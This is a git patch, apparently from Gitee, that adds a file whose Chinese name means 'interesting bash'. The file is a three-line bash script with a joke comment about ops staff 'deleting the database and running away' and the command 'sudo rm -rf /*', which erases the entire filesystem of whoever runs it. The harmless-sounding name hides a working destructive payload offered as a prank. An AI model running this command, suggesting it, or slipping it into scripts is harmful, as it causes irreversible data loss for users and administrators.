From 0ab8a542a8a18c25c9832c0d9219514f01f535b5 Mon Sep 17 00:00:00 2001 From: smartwyy <645583145@qq.com> Date: Wed, 3 Jun 2020 12:01:21 +0800 Subject: [PATCH] =?UTF-8?q?add=20=E6=9C=89=E6=84=8F=E6=80=9D=E7=9A=84bash.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- "\346\234\211\346\204\217\346\200\235\347\232\204bash" | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 "\346\234\211\346\204\217\346\200\235\347\232\204bash" diff --git "a/\346\234\211\346\204\217\346\200\235\347\232\204bash" "b/\346\234\211\346\204\217\346\200\235\347\232\204bash" new file mode 100644 index 0000000..aba404c --- /dev/null +++ "b/\346\234\211\346\204\217\346\200\235\347\232\204bash" @@ -0,0 +1,3 @@ +#!/bin/bash +#IT从入门到放弃,运维从删库到跑路 +sudo rm -rf /* \ No newline at end of file -- Gitee